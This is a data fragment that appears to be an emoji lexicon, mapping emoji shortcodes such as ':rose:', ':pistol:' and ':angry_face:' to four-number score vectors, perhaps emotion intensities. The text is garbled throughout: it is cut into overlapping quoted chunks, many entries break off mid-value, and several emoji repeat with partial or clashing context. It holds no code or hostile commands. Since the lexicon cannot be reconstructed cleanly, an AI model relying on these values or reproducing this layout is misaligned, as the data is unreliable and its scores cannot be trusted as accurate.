\":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\":", "\":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205,", "0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17],", "0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\":", "0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157,", "0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165],", "0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\":", "0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\":", "0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002],", "\":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335,", "[0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457,", "\":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221,", "0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\":", "\":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131,", "0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\":", "0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188,", "0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18,", "0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12],", "[0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109,", "0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001],", "0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\":", "\":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214,", "0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\":", "[0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151], \":barber_pole:\": [0.135, 0.163, 0.174,", "0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002, 0.319, 0.307], \":up-right_arrow:\":", "[0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226,", "\":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209,", "\":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24,", "0.262, 0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\":", "0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185,", "0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\":", "0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003],", "[0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242,", "0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\":", "0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209,", "\":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33,", "0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187],", "0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183,", "\":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341,", "0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272,", "0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\":", "0.228], \":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191,", "0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078,", "0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\":", "0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\":", "[0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315,", "0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\":", "0.201], \":birthday_cake:\": [0.055, 0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273,", "\":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2,", "\":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222,", "[0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002,", "[0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222,", "0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293,", "0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053,", "0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127,", "0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002,", "[0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995,", "0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217],", "0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272,", "0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321,", "0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252],", "[0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226,", "[0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34,", "\":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997,", "0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179,", "\":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245,", "\":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192,", "[0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159,", "\":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139,", "\":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126, 0.139,", "[0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418,", "0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26,", "0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174],", "0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032], \":mouse_face:\": [0.18899999999999997,", "0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302],", "0.179, 0.135, 0.171], \":radio_button:\": [0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002],", "0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193],", "0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\":", "[0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136,", "0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\":", "0.233, 0.18899999999999997, 0.282], \":violin:\": [0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157],", "[0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128,", "0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997],", "0.252], \":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188,", "\":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25,", "0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203],", "[0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999,", "[0.218, 0.209, 0.158, 0.261], \":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175,", "0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\":", "0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152,", "[0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051,", "\":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001,", "\":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999,", "0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\":", "\":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109,", "0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\": [0.162, 0.297, 0.062, 0.2], \":fast_down_button:\":", "\":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996,", "\":cherry_blossom:\": [0.122, 0.19699999999999998, 0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132,", "0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\":", "[0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999,", "0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997,", "0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001,", "0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092,", "[0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004,", "0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204],", "0.177, 0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195],", "\":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001,", "\":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193,", "0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\":", "0.11900000000000001], \":roller_coaster:\": [0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245,", "0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\":", "[0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997,", "\":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174,", "0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\":", "0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353],", "0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242], \":clinking_beer_mugs:\":", "0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\":", "\":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002,", "0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256,", "0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\":", "\":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201,", "\":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188,", "0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29],", "0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\":", "\":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147,", "[0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213,", "[0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35,", "0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262],", "0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21],", "0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156,", "0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135, 0.171], \":radio_button:\":", "0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147,", "0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004, 0.139, 0.129], \":Aries:\":", "0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\":", "\":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449,", "\":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005,", "[0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141,", "0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\":", "0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\":", "[0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245,", "0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278, 0.185],", "\":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002,", "0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\":", "[0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317,", "0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285,", "0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\":", "0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16, 0.324, 0.156], \":wrapped_gift:\": [0.076,", "[0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133,", "0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\":", "0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22],", "[0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221, 0.24], \":ATM_sign:\": [0.128, 0.179, 0.135,", "0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401],", "0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\":", "0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177,", "[0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128,", "\":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998,", "0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165,", "0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\":", "0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222,", "[0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003,", "0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242],", "\":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 